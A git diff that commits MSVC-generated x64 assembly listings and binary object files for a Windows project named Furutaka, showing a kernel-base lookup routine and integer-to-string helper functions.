+ mov rcx, rsi
+ call QWORD PTR __imp_RtlAllocateHeap
+ mov rbx, rax
+; Line 40
+ test rax, rax
+ je SHORT $LN5@supGetSyst
+; Line 41
+ lea r9, QWORD PTR memIO$[rsp]
+ mov r8d, edi
+ mov rdx, rax
+ mov ecx, r14d
+ call QWORD PTR __imp_NtQuerySystemInformation
+; Line 46
+ cmp eax, -1073741820 ; ffffffffc0000004H
+ jne SHORT $LN3@supGetSyst
+; Line 47
+ mov r8, rbx
+ xor edx, edx
+ mov rcx, rsi
+ call QWORD PTR __imp_RtlFreeHeap
+; Line 49
+ add edi, edi
+; Line 50
+ inc ebp
+; Line 51
+ cmp ebp, 100 ; 00000064H
+ jle SHORT $LL4@supGetSyst
+ jmp SHORT $LN5@supGetSyst
+$LN3@supGetSyst:
+; Line 58
+ test eax, eax
+ js SHORT $LN20@supGetSyst
+; Line 59
+ mov rax, rbx
+ jmp SHORT $LN1@supGetSyst
+$LN20@supGetSyst:
+; Line 63
+ mov r8, rbx
+ xor edx, edx
+ mov rcx, rsi
+ call QWORD PTR __imp_RtlFreeHeap
+$LN5@supGetSyst:
+; Line 44
+ xor eax, eax
+$LN1@supGetSyst:
+; Line 66
+ mov rbx, QWORD PTR [rsp+64]
+ mov rbp, QWORD PTR [rsp+80]
+ add rsp, 32 ; 00000020H
+ pop r14
+ pop rdi
+ pop rsi
+ ret 0
+supGetSystemInfo ENDP
+_TEXT ENDS
+; Function compile flags: /Ogspy
+; COMDAT supGetNtOsBase
+_TEXT SEGMENT
+supGetNtOsBase PROC ; COMDAT
+; File J:\Workspace\drivers\TDL\Source\Furutaka\sup.c
+; Line 79
+$LN9:
+ push rbx
+ sub rsp, 32 ; 00000020H
+; Line 81
+ xor ebx, ebx
+; Line 83
+ lea ecx, QWORD PTR [rbx+11]
+ call supGetSystemInfo
+; Line 84
+ test rax, rax
+ je SHORT $LN2@supGetNtOs
+; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h
+; Line 22853
+ mov rcx, QWORD PTR gs:48
+; File J:\Workspace\drivers\TDL\Source\Furutaka\sup.c
+; Line 86
+ mov r8, rax
+ mov rbx, QWORD PTR [rax+24]
+ xor edx, edx
+ mov rcx, QWORD PTR [rcx+96]
+ mov rcx, QWORD PTR [rcx+48]
+ call QWORD PTR __imp_RtlFreeHeap
+$LN2@supGetNtOs:
+; Line 88
+ mov rax, rbx
+; Line 89
+ add rsp, 32 ; 00000020H
+ pop rbx
+ ret 0
+supGetNtOsBase ENDP
+_TEXT ENDS
+END
diff --git a/Source/Furutaka/output/x64/Release/asmlist/u64tohex.asm b/Source/Furutaka/output/x64/Release/asmlist/u64tohex.asm
new file mode 100644
index 0000000..b1936ed
--- /dev/null
+++ b/Source/Furutaka/output/x64/Release/asmlist/u64tohex.asm
@@ -0,0 +1,117 @@
+; Listing generated by Microsoft (R) Optimizing Compiler Version 19.28.29335.0
+
+include listing.inc
+
+INCLUDELIB LIBCMT
+INCLUDELIB OLDNAMES
+
+PUBLIC u64tohex_a
+PUBLIC u64tohex_w
+; COMDAT pdata
+pdata SEGMENT
+$pdata$u64tohex_w DD imagerel $LN19
+ DD imagerel $LN19+93
+ DD imagerel $unwind$u64tohex_w
+pdata ENDS
+; COMDAT xdata
+xdata SEGMENT
+$unwind$u64tohex_w DD 020501H
+ DD 013405H
+xdata ENDS
+; Function compile flags: /Ogspy
+; COMDAT u64tohex_w
+_TEXT SEGMENT
+x$ = 8
+s$ = 16
+u64tohex_w PROC ; COMDAT
+; File J:\Workspace\drivers\TDL\Source\Furutaka\minirtl\u64tohex.c
+; Line 28
+$LN19:
+ mov QWORD PTR [rsp+8], rbx
+; Line 32
+ xor ebx, ebx
+ mov r8, rdx
+ mov r9, rcx
+ test rdx, rdx
+ jne SHORT $LN5@u64tohex_w
+; Line 33
+ lea eax, QWORD PTR [rdx+16]
+ jmp SHORT $LN1@u64tohex_w
+$LN5@u64tohex_w:
+; Line 35
+ lea r10, QWORD PTR [rdx+30]
+ mov edx, 16
+ mov r11d, edx
+$LL11@u64tohex_w:
+; Line 36
+ movzx ecx, r9w
+; Line 37
+ shr r9, 4
+ and cx, 15
+; Line 44
+ cmp cx, 10
+ sbb ax, ax
+ and ax, 65529 ; 0000fff9H
+ add ax, 55 ; 00000037H
+ add ax, cx
+ mov WORD PTR [r10], ax
+ lea r10, QWORD PTR [r10-2]
+ sub r11, 1
+ jne SHORT $LL11@u64tohex_w
+; Line 47
+ mov WORD PTR [r8+32], bx
+; Line 48
+ mov rax, rdx
+$LN1@u64tohex_w:
+; Line 49
+ mov rbx, QWORD PTR [rsp+8]
+ ret 0
+u64tohex_w ENDP
+_TEXT ENDS
+; Function compile flags: /Ogspy
+; COMDAT u64tohex_a
+_TEXT SEGMENT
+x$ = 8
+s$ = 16
+u64tohex_a PROC ; COMDAT
+; File J:\Workspace\drivers\TDL\Source\Furutaka\minirtl\u64tohex.c
+; Line 4
+ mov r8, rdx
+ mov r9, rcx
+; Line 8
+ test rdx, rdx
+ jne SHORT $LN5@u64tohex_a
+; Line 9
+ lea eax, QWORD PTR [rdx+16]
+; Line 25
+ ret 0
+$LN5@u64tohex_a:
+; Line 11
+ lea r10, QWORD PTR [rdx+15]
+ mov edx, 16
+ mov r11d, edx
+$LL11@u64tohex_a:
+; Line 12
+ mov cl, r9b
+; Line 13
+ shr r9, 4
+ and cl, 15
+; Line 20
+ cmp cl, 10
+ sbb al, al
+ and al, -7
+ add al, 55 ; 00000037H
+ add al, cl
+ mov BYTE PTR [r10], al
+ dec r10
+ sub r11, 1
+ jne SHORT $LL11@u64tohex_a
+; Line 23
+ mov BYTE PTR [r8+16], r11b
+; Line 24
+ mov rax, rdx
+; Line 25
+ ret 0
+u64tohex_a ENDP
+_TEXT ENDS
+END
diff --git a/Source/Furutaka/output/x64/Release/asmlist/u64tostr.asm b/Source/Furutaka/output/x64/Release/asmlist/u64tostr.asm
new file mode 100644
index 0000000..9853253
--- /dev/null
+++ b/Source/Furutaka/output/x64/Release/asmlist/u64tostr.asm
@@ -0,0 +1,166 @@
+; Listing generated by Microsoft (R) Optimizing Compiler Version 19.28.29335.0
+
+include listing.inc
+
+INCLUDELIB LIBCMT
+INCLUDELIB OLDNAMES
+
+PUBLIC u64tostr_a
+PUBLIC u64tostr_w
+; COMDAT pdata
+pdata SEGMENT
+$pdata$u64tostr_a DD imagerel $LN19
+ DD imagerel $LN19+123
+ DD imagerel $unwind$u64tostr_a
+pdata ENDS
+; COMDAT pdata
+pdata SEGMENT
+$pdata$u64tostr_w DD imagerel $LN19
+ DD imagerel $LN19+161
+ DD imagerel $unwind$u64tostr_w
+pdata ENDS
+; COMDAT xdata
+xdata SEGMENT
+$unwind$u64tostr_w DD 060f01H
+ DD 03740fH
+ DD 02640aH
+ DD 013405H
+xdata ENDS
+; COMDAT xdata
+xdata SEGMENT
+$unwind$u64tostr_a DD 020501H
+ DD 013405H
+xdata ENDS
+; Function compile flags: /Ogspy
+; COMDAT u64tostr_w
+_TEXT SEGMENT
+x$ = 8
+s$ = 16
+u64tostr_w PROC ; COMDAT
+; File J:\Workspace\drivers\TDL\Source\Furutaka\minirtl\u64tostr.c
+; Line 26
+$LN19:
+ mov QWORD PTR [rsp+8], rbx
+ mov QWORD PTR [rsp+16], rsi
+ mov QWORD PTR [rsp+24], rdi
+ mov r10, rdx
+; Line 27
+ mov rdx, rcx
+ mov r9, rcx
+; Line 30
+ mov rsi, -3689348814741910323 ; cccccccccccccccdH
+ mov r8d, 1
+ cmp rcx, 10
+ jb SHORT $LN3@u64tostr_w
+$LL2@u64tostr_w:
+; Line 31
+ mov rax, rsi
+; Line 32
+ inc r8
+ mul rdx
+ shr rdx, 3
+ cmp rdx, 10
+ jae SHORT $LL2@u64tostr_w
+$LN3@u64tostr_w:
+; Line 35
+ xor edi, edi
+ test r10, r10
+ je SHORT $LN17@u64tostr_w
+; Line 38
+ mov r11, r8
+ test r8, r8
+ je SHORT $LN5@u64tostr_w
+ lea rbx, QWORD PTR [r10-2]
+ lea rbx, QWORD PTR [rbx+r8*2]
+$LL6@u64tostr_w:
+; Line 39
+ mov rax, rsi
+ mul r9
+ shr rdx, 3
+ movzx eax, dx
+ shl ax, 2
+ lea ecx, DWORD PTR [rax+rdx]
+ add cx, cx
+ sub r9w, cx
+ add r9w, 48 ; 00000030H
+ mov WORD PTR [rbx], r9w
+; Line 40
+ mov r9, rdx
+ lea rbx, QWORD PTR [rbx-2]
+ sub r11, 1
+ jne SHORT $LL6@u64tostr_w
+$LN5@u64tostr_w:
+; Line 43
+ mov WORD PTR [r10+r8*2], di
+$LN17@u64tostr_w:
+; Line 45
+ mov rbx, QWORD PTR [rsp+8]
+ mov rax, r8
+ mov rsi, QWORD PTR [rsp+16]
+ mov rdi, QWORD PTR [rsp+24]
+ ret 0
+u64tostr_w ENDP
+_TEXT ENDS
+; Function compile flags: /Ogspy
+; COMDAT u64tostr_a
+_TEXT SEGMENT
+x$ = 8
+s$ = 16
+u64tostr_a PROC ; COMDAT
+; File J:\Workspace\drivers\TDL\Source\Furutaka\minirtl\u64tostr.c
+; Line 4
+$LN19:
+ mov QWORD PTR [rsp+8], rbx
+ mov r10, rdx
+; Line 5
+ mov rdx, rcx
+ mov r9, rcx
+; Line 8
+ mov rbx, -3689348814741910323 ; cccccccccccccccdH
+ mov r8d, 1
+ cmp rcx, 10
+ jb SHORT $LN3@u64tostr_a
+$LL2@u64tostr_a:
+; Line 9
+ mov rax, rbx
+; Line 10
+ inc r8
+ mul rdx
+ shr rdx, 3
+ cmp rdx, 10
+ jae SHORT $LL2@u64tostr_a
+$LN3@u64tostr_a:
+; Line 13
+ test r10, r10
+ je SHORT $LN17@u64tostr_a
+; Line 16
+ mov r11, r8
+ test r8, r8
+ je SHORT $LN5@u64tostr_a
+$LL6@u64tostr_a:
+; Line 17
+ mov rax, rbx
+ mul r9
+ shr rdx, 3
+ mov al, dl
+ shl al, 2
+ lea ecx, DWORD PTR [rax+rdx]
+ add cl, cl
+ sub r9b, cl
+ add r9b, 48 ; 00000030H
+ mov BYTE PTR [r10+r11-1], r9b
+; Line 18
+ mov r9, rdx
+ sub r11, 1
+ jne SHORT $LL6@u64tostr_a
+$LN5@u64tostr_a:
+; Line 21
+ mov BYTE PTR [r8+r10], 0
+$LN17@u64tostr_a:
+; Line 23
+ mov rbx, QWORD PTR [rsp+8]
+ mov rax, r8
+ ret 0
+u64tostr_a ENDP
+_TEXT ENDS
+END
diff --git a/Source/Furutaka/output/x64/Release/asmlist/ultohex.asm b/Source/Furutaka/output/x64/Release/asmlist/ultohex.asm
new file mode 100644
index 0000000..dc1088b
--- /dev/null
+++ b/Source/Furutaka/output/x64/Release/asmlist/ultohex.asm
@@ -0,0 +1,117 @@
+; Listing generated by Microsoft (R) Optimizing Compiler Version 19.28.29335.0
+
+include listing.inc
+
+INCLUDELIB LIBCMT
+INCLUDELIB OLDNAMES
+
+PUBLIC ultohex_a
+PUBLIC ultohex_w
+; COMDAT pdata
+pdata SEGMENT
+$pdata$ultohex_w DD imagerel $LN19
+ DD imagerel $LN19+93
+ DD imagerel $unwind$ultohex_w
+pdata ENDS
+; COMDAT xdata
+xdata SEGMENT
+$unwind$ultohex_w DD 020501H
+ DD 013405H
+xdata ENDS
+; Function compile flags: /Ogspy
+; COMDAT ultohex_w
+_TEXT SEGMENT
+x$ = 8
+s$ = 16
+ultohex_w PROC ; COMDAT
+; File J:\Workspace\drivers\TDL\Source\Furutaka\minirtl\ultohex.c
+; Line 28
+$LN19:
+ mov QWORD PTR [rsp+8], rbx
+; Line 32
+ xor ebx, ebx
+ mov r8, rdx
+ mov r9d, ecx
+ test rdx, rdx
+ jne SHORT $LN5@ultohex_w
+; Line 33
+ lea eax, QWORD PTR [rdx+8]
+ jmp SHORT $LN1@ultohex_w
+$LN5@ultohex_w:
+; Line 35
+ lea r10, QWORD PTR [rdx+14]
+ mov edx, 8
+ mov r11d, edx
+$LL11@ultohex_w:
+; Line 36
+ movzx ecx, r9w
+; Line 37
+ shr r9d, 4
+ and cx, 15
+; Line 44
+ cmp cx, 10
+ sbb ax, ax
+ and ax, 65529 ; 0000fff9H
+ add ax, 55 ; 00000037H
+ add ax, cx
+ mov WORD PTR [r10], ax
+ lea r10, QWORD PTR [r10-2]
+ sub r11, 1
+ jne SHORT $LL11@ultohex_w
+; Line 47
+ mov WORD PTR [r8+16], bx
+; Line 48
+ mov rax, rdx
+$LN1@ultohex_w:
+; Line 49
+ mov rbx, QWORD PTR [rsp+8]
+ ret 0
+ultohex_w ENDP
+_TEXT ENDS
+; Function compile flags: /Ogspy
+; COMDAT ultohex_a
+_TEXT SEGMENT
+x$ = 8
+s$ = 16
+ultohex_a PROC ; COMDAT
+; File J:\Workspace\drivers\TDL\Source\Furutaka\minirtl\ultohex.c
+; Line 4
+ mov r8, rdx
+ mov r9d, ecx
+; Line 8
+ test rdx, rdx
+ jne SHORT $LN5@ultohex_a
+; Line 9
+ lea eax, QWORD PTR [rdx+8]
+; Line 25
+ ret 0
+$LN5@ultohex_a:
+; Line 11
+ lea r10, QWORD PTR [rdx+7]
+ mov edx, 8
+ mov r11d, edx
+$LL11@ultohex_a:
+; Line 12
+ mov cl, r9b
+; Line 13
+ shr r9d, 4
+ and cl, 15
+; Line 20
+ cmp cl, 10
+ sbb al, al
+ and al, -7
+ add al, 55 ; 00000037H
+ add al, cl
+ mov BYTE PTR [r10], al
+ dec r10
+ sub r11, 1
+ jne SHORT $LL11@ultohex_a
+; Line 23
+ mov BYTE PTR [r8+8], r11b
+; Line 24
+ mov rax, rdx
+; Line 25
+ ret 0
+ultohex_a ENDP
+_TEXT ENDS
+END
diff --git a/Source/Furutaka/output/x64/Release/asmlist/ultostr.asm b/Source/Furutaka/output/x64/Release/asmlist/ultostr.asm
new file mode 100644
index 0000000..a20146c
--- /dev/null
+++ b/Source/Furutaka/output/x64/Release/asmlist/ultostr.asm
@@ -0,0 +1,149 @@
+; Listing generated by Microsoft (R) Optimizing Compiler Version 19.28.29335.0
+
+include listing.inc
+
+INCLUDELIB LIBCMT
+INCLUDELIB OLDNAMES
+
+PUBLIC ultostr_a
+PUBLIC ultostr_w
+; COMDAT pdata
+pdata SEGMENT
+$pdata$ultostr_w DD imagerel $LN19
+ DD imagerel $LN19+139
+ DD imagerel $unwind$ultostr_w
+pdata ENDS
+; COMDAT xdata
+xdata SEGMENT
+$unwind$ultostr_w DD 040a01H
+ DD 02740aH
+ DD 013405H
+xdata ENDS
+; Function compile flags: /Ogspy
+; COMDAT ultostr_w
+_TEXT SEGMENT
+x$ = 8
+s$ = 16
+ultostr_w PROC ; COMDAT
+; File J:\Workspace\drivers\TDL\Source\Furutaka\minirtl\ultostr.c
+; Line 26
+$LN19:
+ mov QWORD PTR [rsp+8], rbx
+ mov QWORD PTR [rsp+16], rdi
+ mov r10, rdx
+; Line 27
+ mov edx, ecx
+ mov r9d, ecx
+; Line 28
+ mov r8d, 1
+; Line 30
+ cmp ecx, 10
+ jb SHORT $LN3@ultostr_w
+$LL2@ultostr_w:
+; Line 31
+ mov eax, -858993459 ; cccccccdH
+; Line 32
+ inc r8
+ mul edx
+ shr edx, 3
+ cmp edx, 10
+ jae SHORT $LL2@ultostr_w
+$LN3@ultostr_w:
+; Line 35
+ xor edi, edi
+ test r10, r10
+ je SHORT $LN17@ultostr_w
+; Line 38
+ mov r11, r8
+ test r8, r8
+ je SHORT $LN5@ultostr_w
+ lea rbx, QWORD PTR [r10-2]
+ lea rbx, QWORD PTR [rbx+r8*2]
+$LL6@ultostr_w:
+; Line 39
+ mov eax, -858993459 ; cccccccdH
+ mul r9d
+ shr edx, 3
+ movzx eax, dx
+ shl ax, 2
+ lea ecx, DWORD PTR [rax+rdx]
+ add cx, cx
+ sub r9w, cx
+ add r9w, 48 ; 00000030H
+ mov WORD PTR [rbx], r9w
+; Line 40
+ mov r9d, edx
+ lea rbx, QWORD PTR [rbx-2]
+ sub r11, 1
+ jne SHORT $LL6@ultostr_w
+$LN5@ultostr_w:
+; Line 43
+ mov WORD PTR [r10+r8*2], di
+$LN17@ultostr_w:
+; Line 45
+ mov rbx, QWORD PTR [rsp+8]
+ mov rax, r8
+ mov rdi, QWORD PTR [rsp+16]
+ ret 0
+ultostr_w ENDP
+_TEXT ENDS
+; Function compile flags: /Ogspy
+; COMDAT ultostr_a
+_TEXT SEGMENT
+x$ = 8
+s$ = 16
+ultostr_a PROC ; COMDAT
+; File J:\Workspace\drivers\TDL\Source\Furutaka\minirtl\ultostr.c
+; Line 4
+ mov r10, rdx
+; Line 5
+ mov edx, ecx
+ mov r9d, ecx
+; Line 6
+ mov r8d, 1
+; Line 8
+ cmp ecx, 10
+ jb SHORT $LN3@ultostr_a
+$LL2@ultostr_a:
+; Line 9
+ mov eax, -858993459 ; cccccccdH
+; Line 10
+ inc r8
+ mul edx
+ shr edx, 3
+ cmp edx, 10
+ jae SHORT $LL2@ultostr_a
+$LN3@ultostr_a:
+; Line 13
+ test r10, r10
+ je SHORT $LN17@ultostr_a
+; Line 16
+ mov r11, r8
+ test r8, r8
+ je SHORT $LN5@ultostr_a
+$LL6@ultostr_a:
+; Line 17
+ mov eax, -858993459 ; cccccccdH
+ mul r9d
+ shr edx, 3
+ mov al, dl
+ shl al, 2
+ lea ecx, DWORD PTR [rax+rdx]
+ add cl, cl
+ sub r9b, cl
+ add r9b, 48 ; 00000030H
+ mov BYTE PTR [r10+r11-1], r9b
+; Line 18
+ mov r9d, edx
+ sub r11, 1
+ jne SHORT $LL6@ultostr_a
+$LN5@ultostr_a:
+; Line 21
+ mov BYTE PTR [r8+r10], 0
+$LN17@ultostr_a:
+; Line 23
+ mov rax, r8
+ ret 0
+ultostr_a ENDP
+_TEXT ENDS
+END
diff --git a/Source/Furutaka/output/x64/Release/cmdline.obj b/Source/Furutaka/output/x64/Release/cmdline.obj
new file mode 100644
index 0000000..452a265
Binary files /dev/null and b/Source/Furutaka/output/x64/Release/cmdline.obj differ
diff --git a/Source/Furutaka/output/x64/Release/cui.obj b/Source/Furutaka/output/x64/Release/cui.obj
new file mode 100644
index 0000000..74ff75f
Binary files /dev/null and b/Source/Furutaka/output/x64/Release/cui.obj differ
diff --git a/Source/Furutaka/output/x64/Release/instdrv.obj b/Source/Furutaka/output/x64/Release/instdrv.obj
new file mode 100644
index 0000000..f91fa10
Binary files /dev/null and b/Source/Furutaka/output/x64/Release/instdrv.obj differ
diff --git a/Source/Furutaka/output/x64/Release/main.obj b/Source/Furutaka/output/x64/Release/main.obj
new file mode 100644
index 0000000..9173634
Binary files /dev/null and b/Source/Furutaka/output/x64/Release/main.obj differ
diff --git a/Source/Furutaka/output/x64/Release/resource.res b/Source/Furutaka/output/x64/Release/resource.res
new file mode 100644
index 0000000..3d488a0
Binary files /dev/null and b/Source/Furutaka/output/x64/Release/resource.res differ
diff --git a/Source/Furutaka/output/x64/Release/sup.obj b/Source/Furutaka/output/x64/Release/sup.obj
new file mode 100644
index 0000000..a6bd568
Binary files /dev/null and b/Source/Furutaka/output/x64/Release/sup.obj differ
diff --git a/Source/Furutaka/output/x64/Release/u64tohex.obj b/Source/Furutaka/output/x64/Release/u64tohex.obj
new file mode 100644
index 0000000..06614d9
Binary files /dev/null and b/Source/Furutaka/output/x64/Release/u64tohex.obj differ
diff --git a/Source/Furutaka/output/x64/Release/u64tostr.obj b/Source/Furutaka/output/x64/Release/u64tostr.obj
new file mode 100644
index 0000000..dcca411
Binary files /dev/null and b/Source/Furutaka/output/x64/Release/u64tostr.obj differ
diff --git a/Source/Furutaka/output/x64/Release/ultohex.obj b/Source/Furutaka/output/x64/Release/ultohex.obj
new file mode 100644
index 0000000..b74f569
Binary files /dev/null and b/Source/Furutaka/output/x64/Release/ultohex.obj differ
diff --git a/Source/Furutaka/output/x64/Release/ultostr.obj b/Source/Furutaka/output/x64/Release/ultostr.obj
new file mode 100644
index 0000000..770dd8f
Binary files /dev/null and b/Source/Furutaka/output/x64/Release/ultostr.obj differ
diff --git a/Source/Furutaka/output/x64/Release/vc142.pdb b/Source/Furutaka/output/x64/Release/vc142.pdb
new file mode 100644
index 0000000..2c0d762
Binary files /dev/null and b/Source/Furutaka/output/x64/Release/vc142.pdb differ